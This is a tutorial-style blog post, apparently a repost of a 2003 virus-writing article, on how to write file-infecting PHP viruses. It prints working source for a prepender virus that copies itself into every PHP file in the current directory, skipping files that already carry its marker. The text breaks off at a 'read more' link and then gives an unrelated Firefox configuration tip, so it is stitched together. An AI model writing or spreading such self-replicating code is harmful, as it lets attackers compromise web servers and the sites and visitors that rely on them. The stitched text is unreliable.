WARNING: THIS IS FOR EDUCATIONAL PURPOSES ONLY! I AM NOT RESPONSIBLE FOR HOW YOU USE THIS INFORMATION!!!!!
0) Intro Words
PHP, abbreviate: ‘Hypertext Preprocessor’, is a very common script language for the world-wide-web. You’re possible to do nearly everthing internet related with that language. That means, you’re also able to make viruses for it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was done in October 2000, and was released in 29A#5. It was no real virus, moreover a companion. It writes to every PHP-file in the current directory a line, which let the victim run the virus. But the host doesn’t contain the virus. After searching something about PHP viruses I found out that there is no high-tech PHP virus so far out, because all the virus I could find are rips of PHP.Pirus (useing the same prinzip). That was my inspiration in writing such an article. I wanted to make something totally new, and I guess I had success. I tested every source with PHP 4.3.3, and everthing worked fine. Now go on reading this and learn something about PHP viruses!
1) File Infection
That’s maybe the most important thing, when you want to make a PHP virus, therefor I want to explain you, how you can infect files with PHP. It should be no problme to understand the examples, because I tried it to make as simple as possible. When the article was written (autumn 2003), there was no real file infector out there. The only interesting PHP virus so far is MaskBits’ PHP.Pirus, which don’t infect files, but use the command ‘include’ that the virus is executed in every PHP file in the current dir. You may think ‘Why does he tell me this?”. I don’t know, just for fun . Now let me explain you how to infect files.
a) Prepending
A prepender copies it’s code infront of the victim’s code, therefor it will be executed before the victim. That’s the main idea of this kind of infection. But there are some other important things you have to note: To get the virus out of the file, you need any information about where the virus is. In my example the virus uses the first 391 bytes. Next important thing is, that you must not infect a file two times. What do to against that? Check, if the file if already infected. In the following example the virus searchs in the first 13 bytes (in an infected file it’s this code: ‘
PHP Prepender Virus Example
$string=fread(fopen(__FILE__,’r'), 391);
$curdir=opendir(‘.’);
while ($file = readdir($curdir))
{
if (strstr($file, ‘.php’))
{
$victim=fopen($file, ‘r+’);
if (!strstr(fread($victim, 13), ‘SPTH’))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file));
}
fclose($victim);
}
}
closedir($curdir);
?>
As this is a real easy virus, you should understand it quickly while looking at it. Now i’m going to give you the most important things the example does:
Reading the first 391 bytes (which is exactly the virus size)
Searchs for every .PHP file in the current directory
If not infected, reading the victim
Read the rest of this entry »
Now in the filter box type in network.http.pipelining and double click it until it ssa true
